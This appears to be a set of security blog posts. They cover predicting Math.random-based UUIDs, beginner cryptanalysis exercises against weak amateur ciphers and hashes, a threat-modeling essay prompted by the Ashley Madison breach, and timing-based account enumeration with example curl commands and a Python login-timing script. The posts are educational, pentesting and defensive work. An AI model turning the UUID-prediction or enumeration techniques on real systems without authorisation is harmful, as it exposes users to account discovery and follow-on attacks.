Here we have made the (hi, lo) global variables used by randomUUID( ). The main( ) takes in a UUID from the command line, that we call target_uuid. We loop through all possible values for hi and for each one, we compute a UUID. We then check to see if it matches the target, and if so, done.

Complete Source Code

The complete source code for the search as described above is here.  It is a bit slow, but it is not hard to make it faster (see next section).  To test it, you will want to verify that you can break some UUIDs generated in JavaScript.  If you are using the Chrome browser, then see this simple JavaScript code here, which runs directly in your browser.  That code calls Math.random() to generated the randomness, just as described above.  However, the attack code will not work if the UUID is generated in other browsers because different browsers implement Math.random() in different ways.  For that reason, I have also another JavaScript implementation that works in all browsers by emulating Chrome’s Math.random(). You can download that here.

Making it faster

There are two ways to make it faster, algorithmically or improving the implementation. Here we focus only on the latter.

The code currently computes a whole UUID for a candidate_hi, which means calling Math.random( ) 36 times. However, if we have a wrong candidate, there is a good chance that you the newly computed UUID will be wrong in the first few nibbles. Why not check the UUID that you are computing while it is being computed against the target and abort early if it does not match? This gives a huge speedup. On my work Macbook Pro, I can perform the brute force within 1 minute.

Concluding remarks

Are you a developer relying on UUIDs for security? If so, you better double-check the implementation under the hood. If you are not sure what is there, then I highly recommend you move away from UUIDs and use something that was designed for cryptographic purposes. UUIDs were not designed for this purpose! If your UUID generator happens to have this property, then you should feel fortunate.

If you’re a pentester and you find some system that relies on UUIDs for security, then I’d be appreciative if you can find out what is implemented under the hood. Often times these things can be broken trivially, as demonstrated above.

 

So, You Want to Learn to Break Ciphers

Every now and then, I read a question about learning how to break ciphers, or more generally how to become a cryptographer/cryptologist.  From my viewpoint, the most important part of learning this skill is not advanced mathematics, but instead first learning how to think like a cryptographer.  When you go to break a cipher, there are no instructions on how to do it.  You simply need to get your hands dirty with the function under consideration and look for things that do not seem desirable for a secure function of that type.  While having a bag of tricks is going to help, ultimately it’s your creativity, persistence, and skills that are more likely going to make the difference.

I believe that there are a number of hackers out there that already know how to think the right way, and it is simply a matter of exercising that thought process on some reasonable, non-contrived examples to begin to understand what it takes to be a cryptologist.  You should not need to know advanced mathematics or advanced cryptographic techniques (such as linear or differential cryptanalysis) to get started.  So welcome to my blog post, which provides a number of exercise for you to practice on.  These examples mostly come from cryptanalysis that I have done, largely because I know the results, I was able to dig them up, and attacking them did not use advanced techniques.  I am building a list of other examples at the bottom of this blog, and invite other readers to add to it.

Before we begin, I want to point out some other resources on this topic:

  • Schneier’s Self-Study Course in Block Cipher Cryptanalysis is a great resource, but in my mind it is not the ideal place to start — from my viewpoint, it is the next step after you prove you can break ciphers such as what I have below.  By the way, you absolutely should read Schneier’s article So, You Want to be a Cryptographer.
  • The Matasano Crypto Challenges.  While they are similar in same spirit of what I am writing here, my focus is at a lower level — breaking specific cryptographic primitives rather than constructs from these primitives.  Regardless, the Matasano challenges are another great place to start.
  • The Simon Singh Cipher Challenges from his book, The Code Book.  This book is really fun to read, and will get you into the spirit of breaking his challenges.  But the first challenges are too easy and the last ones are very hard: it is really the middle ones that are most interesting.

I’m adding to existing resources because I thought I have a nice, small collection of my own that I have accumulated over the years.  Like the Matasano challenges, my focus is on providing modern examples that are easy to break without complex mathematics or advanced cryptographic techniques.  These examples illustrate how to think like a cryptographer without requiring all the complex background in the most advanced cryptanalytic techniques.  If you can solve these problems (and your solutions may not necessarily be the same as mine), then you have the right type of thinking to become a cryptographer.  This blog post is written for computer scientists without deep mathematics skills that want to learn how to do cryptanalysis, and teachers of cryptography for computer science students.

The examples come from different sources.  For example, I have a few proposals by amateurs that were easily cracked, including a couple from the old sci.crypt Google group (it was a popular meeting place for crypto-geeks before Google took over).  I have at least one proposal by an expert in some other field that was attempting to apply his skills to cryptography despite having little background in crypto.  I have one design that was built into software and relied upon for real-world security.  And then I have one example of something that was not intended for cryptographic purposes yet sometimes is misused by developers who do not understand that.  So let’s get started!

PHP’s lcg_value( )

PHP’s lcg_value( ) is a pseudo random number generator (PRNG) that is not intended to provide cryptographic security.  Nevertheless, it occasionally gets used in ways that it should not be used.

The internal state of the PRNG has a total possibility of 2^62 combinations, which is too much to brute force this day in age.  However, one technique that is often employed in cryptanalysis is trying all possibilities for half of the bits (2^31 combinations here) and for each candidate, see if you can compute the remaining bits in constant time.  You then check whether the candidate is right by computing future outputs of the assumed internal state to to see whether or not it matches.  If it does, then you presume you have the right state, and if it does not match, then you know the candidate is wrong.

It turns out that this technique does work for lcg_value( ), and thus it can be cracked in 2^31 operations.  The details are here (the page describes the algorithm, how to attack it, and then provides a link to my solution).  This could take anywhere from a half-day to two days, depending upon your experience.  As a bonus, there is an advanced topic at the end of the link — how to crack lcg_value( ) if you only get a fraction of the output bits per iteration: this is a bit harder.

Chaotic hash function

Every year there is the Crypto conference in Santa Barbara that has a light-hearted “rump session” where participants can present research-in-progress or anything of interest to the cryptographic community.  In the Crypto 2005 rump session, a researcher presented his new hash function based upon chaos theory.  The researcher was unknown to the cryptographic community.  He put up lots of graphs of his hash function, which might have been intimidating to one with no cryptographic experience, but that was not most of the audience, and hence hardly anybody listened to his presentation.  But I listened carefully, because I suspected an easy target that I wanted to have a go at.

Why did I suspect it an easy target?  I knew absolutely zero about chaos theory, and had no intention to learning it.  But what I saw was a guy who did not know anything about cryptography and how ciphers were attacked, and I was pretty sure I could find collisions in his hash function regardless of any graphs or mathematics behind his design.  The only trick was getting an exact specification so that I can demonstrate that I can break it.  This obstacle is often encountered in cryptanalysis — non-experts do not nail down their specification for whatever reason, but the cryptanalyst needs something concrete to demonstrate his attack.  So I exchanged email with him a few times and we finally agreed that the following C code represents his hash function (where ROTL and ROTR are circular left and right bit rotations):

void hash( unsigned int *input, int len, unsigned int output[4] )
{
    unsigned int x, y, z, u, X, Y, Z, U, A, B, C, D, RV1, RV2, RV3, RV4;
    unsigned int M = 0xffff;
    int i, offset;
    x = 0x0124fdce; y = 0x89ab57ea; z = 0xba89370a; u = 0xfedc45ef;
    A = 0x401ab257; B = 0xb7cd34e1; C = 0x76b3a27c; D = 0xf13c3adf;
    RV1 = 0xe12f23cd; RV2 = 0xc5ab6789; RV3 = 0xf1234567; RV4 = 0x9a8bc7ef;

    for (i=0; i < len; ++i) {         offset = 4*i;         X = input[offset + 0] ^ x; Y = input[offset + 1] ^ y;         Z = input[offset + 2] ^ z; U = input[offset + 3] ^ u;          /* compute chaos */         x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
    }
    /* now run 4 more times */
    for (i=0; i < 4; ++i) {         X = x; Y = y; Z = z; U = u;         /* compute chaos */         x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
     }
     output[0] = RV1; output[1] = RV2; output[2] = RV3; output[3] = RV4;
}

Does it look intimidating?  Well, once you start to get your hands dirty, you will see that it is not that bad at all.  The loop at the bottom does not involve any inputs, so if we can create a collision in the top loop, then it will give a collision in the hash.  The top loop takes blocks of 4 input words (128-bits) per iteration and mixes them into the existing state.  Here’s the real killer: for any iteration, the attacker can make (X, Y, Z, U)  to be whatever he wants because he can compute (x, y, z, u) at the beginning of that iteration (simply by processing the previous inputs) and choose the next inputs accordingly.  Now there is still some ugly multiply and rotation stuff in there, but given that you can control (X, Y, Z, U), you can then make those multiplies and rotations behave in a convenient way for your attack.  Suddenly, what seemed to be a ferocious looking lion is nothing more than a tiny kitty cat.  Have a go yourself before you look at my attacks.  This one was easy and really fun to break.

By the way, after breaking this one, you should have decent insight into why algorithms of the MD and SHA families have a pre-processing phase that involves the message length, and use a message expansion that makes sure that functions of the input words get mixed in multiple times per iteration.

Hash Function with “Technique in Overlapping Sums”

Here is another easy one from amateur on the good old sci.crypt group.  The author forgot to both declare and initialise the hash variable, so I fix-up the code below:

#define UL unsigned long
#define LEFT 13
#define RIGHT 19

UL hash[5];
void round() {
    hash[4] += hash[0] >> RIGHT; hash[0] += hash[0] << LEFT;     hash[0] += hash[1] >> RIGHT; hash[1] += hash[1] << LEFT;     hash[1] += hash[2] >> RIGHT; hash[2] += hash[2] << LEFT;     hash[2] += hash[3] >> RIGHT; hash[3] += hash[3] << LEFT;     hash[3] += hash[4] >> RIGHT; hash[4] += hash[4] << LEFT;
}

void processBlock(const UL in[25])
{
    int i, j, r, s;

    memset( hash, 0, sizeof(hash) );
    for (i = 0; i < 5; i++) {
       s = 0;
       for (r=0; r<5; r++) {
           for (j = 0; j < 5; j++) {
               hash[j] ^= in[j+s];
               hash[j]++;
           }
           round();
           s += 5;
       }
    }
}

It seems to only be a compression function (processBlock( )) that takes a 25 word input and produces a 5 word output.  For the r’th round, he is mixing in inputs from in[5*r], … , in[5*r+4] into hash[0], …, hash[4]; seemingly unaware that we could compute the state of hash at any point and choose our next inputs accordingly (similar to the way we broke chaotic hash).  This one falls trivially, but for fun, I made my collisions to be preimages of the all zero output.

FastFlex

When FastFlex was proposed in 2006, the author made bold claims on the sci.crypt newsgroup about it not being resistant to linear or differential cryptanalysis, and wondered if there might be any other issues that he needs to worry about.  When somebody talks about these cryptanalysis techniques, you assume they know a little bit about cryptography, but it just goes to show: learning the techniques without knowing how to think like a cryptographer is of little value.  I took a look at the code the author had, and it had basic problems such as not initialising variables.  Within about a half hour, I found collisions (it may seem like I am always sending in zero words for the functions I break, but I didn’t need to for this one) in the hash function using techniques similar to how I broke the chaotic hash function above, and such collisions could easily be produced regardless of how variables were initialised.  The amusing reply from the author acknowledged the problem but somehow concluded that FastFlex is still safe!

After my reply, the author modified his design and sent it for publication, carefully making sure that the sci.crypt people didn’t see his updated design in the time frame of the publication attempt.  The author claims that the paper was published (see bottom of page), but the updated paper made no acknowledgement of the insecurity of the previous version or my finding.  The evidence for the security in the updated paper is pretty bad.

Unfortunately, the original specification seems to be no longer around, so breaking the new version remains open.  But let’s just say that how I broke it had a lot of similarities to how I broke the chaotic hash function, so first prepare yourself accordingly, and then take out the new FastFlex!  FastFlex is designed to build a number of cryptographic constructs from it.  I recommend starting with the hash functions, and after you break those, go after the random number generator.  If you are like me, you’ll start by going directly after the implementation rather than trying to waste too much time trying to read the author’s research paper.

If FastFlex was indeed published, then you should be able to get a publication out of breaking it provided that you write it up well.  I’d be most delighted to hear successful attacks on this one.  Note to attackers: make sure you save a copy of his code and pdf description after you break it so that the author cannot hide the history.

R.A.T.

Amateurs are never shy to come up with their own cryptographic solutions, and often are generous enough to give them to the world unencumbered by patents.  While their hearts are in the right place, it is just not that easy to build a secure cryptosystem.  At the bottom of this linked page, you can read about the R.A.T. encoding and decoding system.

I’m pretty sure there are numerous ways to attack this one (especially if you want to use linear algebra, but I didn’t), but my solution is in this link.  Don’t look at it until you found your own solution!

But here’s two hints to start you out:

  1. Always give yourself the advantage by starting out with a chosen plaintext attack (or chosen ciphertext attack), and then it can likely be converted into other types of attacks later.
  2. It makes things easier if you write it out in terms of arrays (for A and B) so you can keep track of the relation between things from iteration to iteration.

To elaborate on point 2, the cipher would look something like this (where  A, B, and X are byte arrays of the length of the input size, and key is a byte array of length 256 — how it was generated does not really matter in my attack):

    initialise:  A[0] = 0, B[0] = 128

    for i = 1 to the number of plaintext bytes {
        Let X[i] = i'th plaintext byte
        A1 = X[i] ^ key[ B[i-1] ]
        B[i] = A1 ^ key[ A[i-1] ]
        output B[i] as the i'th byte of the ciphertext
        A[i] = A1
    }

My break revealed bytes of the key when a certain condition happens, but I bet you can generalise it to do better.

“Multiswap”

In 2001, “Beale Screamer” reverse engineered and broke Microsoft’s Digital Rights Scheme — see link.  The scheme involved a cipher that he named “multiswap” (described in the link), because it used multiplication and swapped halves of computer words around.  Beale Screamer’s break of the DRM scheme did not touch the cryptography, which made it a prime target for cryptographers.

I immediately had a look at the cipher, and it didn’t take me long before I found a way to recover two words of the key (k[5] and k[11]) simply by choosing my plaintexts in such a way that made the multiplies disappear (hint hint).  I went to sleep thinking I will return to it the next day for attacking more of the cipher.  Unfortunately, my plans were preempted by a fast team of Berkley cryptographers who had the entire cipher broke by the next day — their solution is here.

Unsurprisingly, I started my attack the exact same way as the the Berkeley team to recover two words of the key.  You should be able to do the same thing.  After that, they used differential cryptanalysis to get the rest.  Since I assume that the reader is new to cryptography, I am not going to expect that he/she derives the remaining parts of the key similar to the Berkeley team.  However, there are various approaches one can play with in order to refine their cryptographic skills.  For example, knowing the plaintext allows you to compute s0′ and s1′ (from Berkeley description, which I believe is easier to work from). Then, one can try to deduce k[0], …, k[4] independently of k[6], … , k[10].  We could almost attempt the same technique that we used to break the lcg_value( ) here, except that’s still too many key bits to guess in a practical implementation.  However, if you reduce the size of the cipher in half (half of the number of key words, half of the number of rounds), then such a technique should work.  Give it a try!

Finally, one of the cutest parts of the Berkeley attack was showing how to convert the chosen plaintext attack into a known plaintext attack.  As we said before, give yourself the best advantage to start out with, and then worry about converting it to other forms of attacks later!

Other targets to play around with

Over many years on sci.crypt, I saw a number of ciphers broken by members of the group.  I also occasionally see new ones that I think must be trivially breakable.  Nowadays, reddit seems to be the place to go.  It is impossible for me to dig up all of the easily broken designs, but here are a few that I remember:

  • The hash function Shahaha was proposed here, and broken by Scott Fluhrer here.  Can you come up with your own break?  (Scott Fluhrer broke a number of amateur designs in the sci.crypt days, but this is the only one I found so far).
  • Just as I was trying to dig up old sci.crypt examples of ciphers, somebody on reddit’s crypto group posted an I designed my own crypto thread.  This is a block cipher called XCRUSH. The full design is here.  The author claims that it is purely an academic exercise and makes no security claims at all in the paper, so his motivation is entirely for learning.  It’s also written up nicely, which is an advantage if you want people to look at your design.  Upon posting it on reddit, a character by the identity of bitwiseshiftleft found theoretical weaknesses quite soon (like in many of the examples above, the magic zero comes into play here again).  See the comments in the reddit thread for more detail. There was also some interesting analysis based upon SAT solvers, but this is outside my expertise so I leave the reference for interested parties.
  • This one might require a little bit of math, who knows how much (can’t be sure — I have not tried attacking it yet).  Here is a public key cryptosystem that seems too good to be true.  However, the author made a pretty basic mistake in his analysis (first observed by rosulek): the author claims to have proven that you can break it by solving circuit satisfiability (SAT).  Ummm, you can break every cryptosystem if you can solve SAT efficiently!  What would have been more interesting was showing the contrapositive: (i.e. if you could break his cryptosystem, then you can solve SAT).  The simple fact that the author did not know which direction to do the security reduction is indicative of his lack of experience, and hints that it can easily be broken.
  • I was debating whether or not to include the first attacks on the original SecurId in the main list above, but ultimately I decided that it is too much detail.  However if anybody wants to have a go, here is the code reverse-engineered from “I.C. Wiener”, here is the description of the function from Belgian cryptographers (My coauthor and I worked from the original version that they posted on eprint, which has since been updated), and here is the first attack I found.  Read through section 1 of my attack, and then try to attack it with the following information in mind: the vanishing differentials (collisions) happen in the first 32-subrounds, so key search can be expedited by computing only part of the function rather than the full thing (so what fraction of the function do you need to compute in order to test for a collision?)  But there is even more you can do here: only the first 32-bits of the key are involved in the first 32-subrounds, and many of these permutations on the data overlap, leading to more speedups. Two important notes: (1) although the term “vanishing differential” suggests differential cryptanalysis (not suitable for a beginner), the term really just means hash collision here, and (2) RSA has since discontinued that function and is now using something more standard in their design.

If you know of any other good ones (including a sample break), then please provide the link and I will try to regularly update the list.

A Retrospective on Ashely Madison and the Value of Threat Modeling

One of my favourite authors in the field of computer security is Gary McGraw.  If you are not familiar with him, I’d suggest you start by reading his book Software Security: Building Security In.  One of the key points he makes is a distinction between security bugs versus security flaws: the former are the simple problems that involve only a small pieces of code, such as cross site scripting, SQL injection, and lack of input sanitisation; the latter are more complex problems at the design level, and thus cannot be pin-pointed to a small section of code.  Gary points out that half of the problems he sees in practice are bugs, the other half are flaws.  These odds are not good when you take into consideration that flaws are much harder than bugs to fix, because they are ingrained into the software’s design.

So here I want to talk about how this applies to the recent Ashley Madison hack.  But I should be clear that calling Ashley Madison a “design flaw” may be a stretch by the current-state-of-the-art in web security software.  What I hope for is that some time in the future, major systems are designed with much more thought into their security and the protection of private information.  Our story starts with what Ashley Madison did right: using bcrypt to protect passwords.

Ashley Madison used Bcrypt to Protect Passwords

As noted in a number of online articles, Ashely Madison protected passwords in the database the right way: they used bcrypt.  (EDIT: On 10 September, a researcher found that the website had a security bug allowing attackers to bypass the bcrypt computation — regardless, continue reading because the real value of this article is when we discuss ephemeral knowledge web applications below).  Ask a leading security practitioner about protecting passwords in databases and they will recommend either bcrypt, scrypt, or PBKDF2 (or Argon2 if they have been following the password hashing competition).  So, Ashely Madison’s did not have a software bug in the password protection.

But let’s step back a moment and ask why tools such as bcrypt are recommended, for which we cite the web’s subject-matter expert, Thomas Pornin:

Let’s see the following scenario: you have a Web site, with users who can “sign in” by showing their name and password. Once signed in, users gain “extra powers” such as reading and writing data. The server must then store “something” which can be used to verify user passwords. The most basic “something” consists in the password themselves. Presumably, the passwords would be stored in a SQL database, probably along with whatever data is used by the application.

The bad thing about such “cleartext” storage of passwords is that it induces a vulnerability in the case of an attack model where the attacker could get a read-only access to the server data. If that data includes the user passwords, then the villain could use these passwords to sign in as any user and get the corresponding powers, including any write access that valid users may have. This is an edge case (attacker can read the database but not write to it). However, this is a realistic edge case. Unwanted read access to parts of a Web server database is a common consequence of an SQL injection vulnerability. This really happens.

There are other ways than SQL injection that a database can leak, including insecure backups, attacker getting a reverse shell (can happen a variety of ways) on the system, physical break-in, insider threat, and poor network configuration.  We don’t know for sure what happened in the case of Ashley Madison, but there is some indication here.

If you have been following security for a while, you will know that database exposures happen all the time.  The good news is that with the exception of not having a password complexity policy, Ashley Madison’s website did protect passwords the right way!

So What’s the Problem Here?

Glad you asked.  You see, the passwords were protected via bcrypt as a “second line of defence“, i.e. to prevent hackers from getting user passwords in the event of a database leak.  But in retrospect, we now know that the hackers that got the data did not give a darn about the users’ passwords: instead, they wanted the users’ private information such as names, addresses, and email addresses.  So why didn’t user private information get the same second level of defence protection that the user passwords got?

Let’s be honest.  Almost certainly the answer is that the web designers never thought about it, or perhaps never cared about that question, and instead just put in their best effort to build the website to the budget that they had, and following the general security best practices that they were aware of.

But the honest question is less interesting to me than the research question: how would you design a website that has a second line of defence for protecting members’ private information?  In other words, if the hacker can get the database, can the information in the database still be protected?  The applicability of this question is not limited to adult websites, for example it may be of value to websites holding patient medical information.

how would you design a website that has a second line of defence for protecting members’ private information?  In other words, if the hacker can get the database, can the information in the database still be protected?  

If you followed me this far, maybe you realise that we are thinking about this from a threat modeling perspective (identifying assets that the system holds and mechanisms for protecting those assets), and we are trying to architect a system that better protects data in the event of a security breach.

Pause and Understand what We are Trying to Solve

If you come from an operational security background, you may be thinking that the problem with the Ashley Madison breach is the lack of operational security defences.  You may be thinking about monitoring, altering, network configuration, patching, intrusion detection, and so on.

Those defences are all fine, but that’s not what we’re trying to do here.  Instead, we’re trying to solve it from an application security perspective: building applications that resist attacks in the event of other things failing.  Think of it as defence in depth: if everything else fails, we still want the data to be protected, just like the passwords are protected.

It’s Not as Simple as Encrypt the Data

I always get amused when people think the solution to everything is encryption.  Encryption is easy, key management is hard.  If you are going to encrypt the database, then where do you put the key?  Given that the website needs to be able to decrypt content as it is needed, it implies that a hacker who gets a shell on the system would also be able to decrypt data as it is needed, so we haven’t really solve anything yet.

Towards a Solution: Basic Concepts

A former colleague of mine, Blair Strang, had a lot of great ideas about protecting private information.  What I write here is largely influenced by his ideas (though I take the blame for any errors in presentation).

This is the most important paragraph of the whole blog: read it three times.  We start with the concept of a zero-knowledge web application, which is a web application built so that not even the server can decrypt the data, and we’re going to relax it slightly and instead require that the server can only decrypt a users’ sensitive data when a user has an active session.  This means that if the system is hacked at any point in time, then only those with active sessions at that time will have their data compromised: other users will be safe by design.  In the event of a breach, most of the data will be protected.

Why do we make this relaxation?  Because a zero-knowledge design is overkill, and hard to realise in practice.  Zero-knowledge web applications are designed with the goal of making it so that you do not even need to trust the service provider, which has the side effect of limiting the features that the server can provide.  We want instead a design where we trust the service provider, however data still remains largely protected in the event of an intrusion.  This means that the server is internally making its best effort to enforce the least privilege concept on sensitive data through a clever use of key management and cryptography (disposing of the cryptographic key and unencrypted data at the end of the user’s session as our second line of defence).  We will call this concept an ephemeral knowledge web application.

As we go forward, keep in mind that a user will typically have sensitive and non-sensitive information in the database.  Taking Ashley Madison as an example, users will have some information that they want to be public (the type of affair they are looking for, their interests, etc…), and other information they want protected (name, email address, address).  The non-sensitive information will be unencrypted and the sensitive information will be encrypted in our design.

A Simple Example: Protecting the Email Address

Let’s start simple, so simple that we will not even use cryptographic keys in this example.  Suppose the user requires the email address and the password to login.  We already know we are protecting the password in the database by bcrypt, but can we not do the same thing with the email address?  Almost, except the salt will bring in some trouble, but if we use a fixed salt for the email protection (still have varying salt for the password), then we have already made progress.

Consider how the user would login: User enters his email address and password.  System applies bcrypt to email address with fixed salt to look up user in database.  From that, system gets the salt that applies for the password, and system computes bcrypt on user provided password with salt to see if it matches hashed password in database.  If so, user is granted access.  Therefore, system granted access without storing the user’s email address in plaintext form in the database.  Note that if user does not exist in the database, see my previous blog for how to handle it properly (preventing account enumeration).

What about user forgetting password?  No problem: user enters email address on forgot password page, system applies bcrypt with fixed salt on user entered email address to see if the user exists in database, and assuming yes, then emails the user a secret link for password reset.  Within the database, we have to associate that secret link to this user to make sure he only resets his own password (not somebody else’s!)

What if the database is exposed?  Anybody could determine if a specific user is in the database by computing bcrypt on that user’s email address and looking for a match in the database, but nobody is going to be able to reverse the entire collection of email addresses, which is a big improvement over the present situation.

This illustrates the concept for a second line of defence for email address protection, but it’s going to be trickier for other data.

Of course those who can get shells on servers and scrape memory will know that the user information (username and password) is still in memory somewhere, until it gets overwritten.  It would be nice if Java had a secure storage for sensitive content like .Net does.

A Second Line of Defence for All the Sensitive Data!

We were able to do quite a similar concept on email addresses as is being done on passwords because the email address is being used to login, but this won’t work for other private data that is not presented by the user when he logs in.  So we’re going to have to change our strategy to protect more.  I’ll just give high level details here — the lower level details can be worked out.

Suppose rather than using bcrypt to just verify the user password, we also use it in another way to derive an encryption key for that user, K_user.  We can imagine for example that K_user is derived from bcrypt applied to the username, password, and salt input combination.  After user is authenticated, K_user is derived, and that key is used to encrypt and decrypt all of the user’s private data.  The data remains decrypted for the session (in separate database table), but at the end of the session the plaintext data it is securely deleted from the database.

What if one user wants to share information with another user, for example, Bob on Ashley Madison wants to have an affair with Alice (who might be a bot).  Bob needs some way to share information, such as his email address, with Alice, and that information has to still be encrypted and unaccessible by the server after he logs out.  The solution to that is bringing in public key cryptography.

Each user needs a public/private key pair.  Each users’ private key needs to be encrypted with K_user.  The public key is not encrypted (it is not sensitive).  Now Bob can send his private information to Alice through the system using her public key.  When she logs in, the system can decrypt and present it to her.  Yet when she is not logged in, the system cannot decrypt it because it does not have her password available to do decrypt her private key.

Okay, that’s progress, but what if we need administrators to have access to some of that private data when they need it?  That functionality can be built in too using a public/private administrator key pair.  But the private administrator key should never be on the same system.  Instead, it needs to be on a separate, network-isolated system because if the hacker can get access to that key and the database, you’ve lost. By having a separate, isolated system for administration, you have a much stronger defence in the event of an attack when compared to the current state-of-the-art.  However, understand the security tradeoffs that are being made: having administrative accessibility to all the data is less secure than not having that feature, but it is still stronger than designs like Ashley Madison where there is no second order defence to a leaked database.

There is one last gotcha that is quite important: what about user forgetting their password?  We can still use the forgot password email secret link for the user to reset their password, but the private data provided by the user is no longer accessible because K_user is lost.  So we either have to tell the users that they lose their information if they forget their password, or the users need to involve an Administrator in an information recovery process.  There are various complexities in how one might build that, but that’s a story for another time.

Conclusion

Generic security advice is useful and common in the web application security industry, but it only solves part of the problem.  You also need to think about the application you are building and what are the threats specific to it.  This is where threat modeling comes in.  As we have seen from the Ashley Madison breach, there are a number of systems where protecting personal information in the event of a security breach would have high value, which is a more difficult task than protecting passwords in the event of a security breach.  However, we introduced a design pattern called ephemeral knowledge web application that illustrates how such protection can be achieved.  Ephemeral knowledge web applications are applicable to designs where trusting the server is acceptable, yet the server holds sensitive personal data that needs a second-order defence protection.

Account Enumeration via Timing Attacks

One of the common issues reported by web application penetration testers is username/account enumeration, typically involving an unauthenticated person trying to identify valid usernames in the system.  Knowing these valid usernames can assist the attacker in crafting further attacks against the system, such as password guessing attacks, phishing attacks, and denial of service attacks via account lockouts.  The following are popular resources for testing for this issue:

All three of these are missing an important approach to testing for enumeration that I have had a lot of success with in the penetration tests that I have done: timing attacks!  Specifically, one can often determine whether a guessed username is valid or not simply by looking at how long the system takes to respond to an authentication/password reset request and comparing that to the amount of time it takes for the system to respond to a request for a valid account.  This implies that if an attacker can guess one valid username, then he can guess many more using this same technique.  Best of all, it can be fully automated by the attacker.

Why Does This Work?

Many systems typically reveal accounts via trivial inspection, simply by looking at the error message or error code returned by the server as suggested in the above links.  Additionally, a number of system designers have decided that user friendliness is more important than account enumeration issues, for example, Atlassian.  What remains are mostly systems designed by people that are aware of security requirements and trying to do what the security people recommend.  One such security recommendation is that a salted hash function is not enough to protection user passwords: instead, you need a slow one-way function such as PBKDF2, bcrypt, scrypt.

I fully agree with the above recommendation, but along with it we have to recognise that we have opened up an account enumeration vector via timing attacks unless you have carefully protected against it (remark: the crackstation link above does talk about timing attacks, but the one they describe is completely different and quite impractical compared to the one we discuss).  This comes because of the typical implementation: when the system goes to verify the user’s credentials, it doesn’t do the slow function computation for accounts that do not exist, whereas it does for accounts that do exist.  It’s not too hard to think of a fix for this issue

It is possible that there are similar issues via password reset requests.  How long does a system take to send an email used to reset a user’s password?  Does this leak whether accounts exist?  My initial experiments suggest that yes it does, but for this blog we will focus on authentication only.

How to Test for It?

There are of course many ways to test for it, so I’ll just give you a couple of my favourites.

Let’s start out with some examples using curl, and since the cool people are using json, we shall too.  On Linux, the code below demonstrates the time to send a json request for an invalid user name (“nosuchuser”) to example.com.

time curl -H "Content-Type: application/json" -X POST -d '{"username":"nosuchuser","password":"wrongpass"}' https://www.example.com/login

If we know there is an “admin” user at the site, we can do a similar test for this user.  What we guess for the password does not matter:

time curl -H "Content-Type: application/json" -X POST -d  '{"username":"admin","password":"wrongpass"}' https://www.example.com/login

Tip: If you are using the Burp intercepting proxy, then you can get the curl commands very easily.  Just intercept the login attempt, right-click on the request, and select “Copy as curl command”.  You can then paste it in the terminal window, but you will need to insert “time ” at the beginning.

On a test system, we are looking for a big timing difference between the two requests.  Keep in mind that the time per request will vary from request to request due to numerous factors, but if we see that the slowest time for nosuchuser is much faster than the fastest time for the known user (“admin” in this case), then we know the site is vulnerable.  Starting out, you might try say 5 timings for each of a known user and an unknown user: if the site is vulnerable, the timings will leave no doubt in your mind. Once you are sure the site is vulnerable, a single timing for a guessed username will immediately reveal its validity.

I have not tried this on a live system, but depending upon the number of users and servers, I could guess that in some cases (systems with many users and many servers), the signal-to-noise ratio may not be so large, so multiple queries may be needed.

What about Python code? Below is some code using the requests library that I have used for a few pentests in a similar manner as to the curl:

import json
import sys
import requests
import urllib
import time

# Login to  serverurl
# Raises an exception if things don't work.
def login( auth_url, username, password ):
    headers = {'Content-Type': 'application/json' }
    login_values = {"username":username, "password":password}
    r = requests.post( auth_url, data=json.dumps(login_values), headers=headers )
    if r.status_code == 200:
        return r.cookies
    else:
        raise ValueError(json.loads(r.text)['Message'])

auth_url="https://www.example.com/login"
username="testuser"
password="wrongpass"

starttime = time.time() * 1000
try:
    cookie = login( auth_url, username, password )
    print "Login succeeded, got cookie :-)"
except:
    print "Failed to login!"
endtime = time.time() * 1000

print "Time in milliseconds: ", endtime-starttime

Recommendations

As I alluded to above, there is a trivial fix for this: for accounts that do not exist, do a “dummy” password validation check.  This means computing the PBKDF2 / bcrypt / scrypt / whatever on the input data and whatever else you would do for an invalid password before you reject the login attempt.

However, I want to caution the reader because there are more issues here when one uses something like PBKDF2 on the server side, such as denial of service.  That’s why I wrote a research paper about this topic.

Last, I want to say that I think account enumeration becomes less of an issue if we have better protections for authentication than just a single password.  There have been ideas for better balancing security and usability, such as allowing a single password only when a user is coming from an IP address or a device that he has authenticated with before, and requiring two-factor authentication otherwise.  See this and this for examples.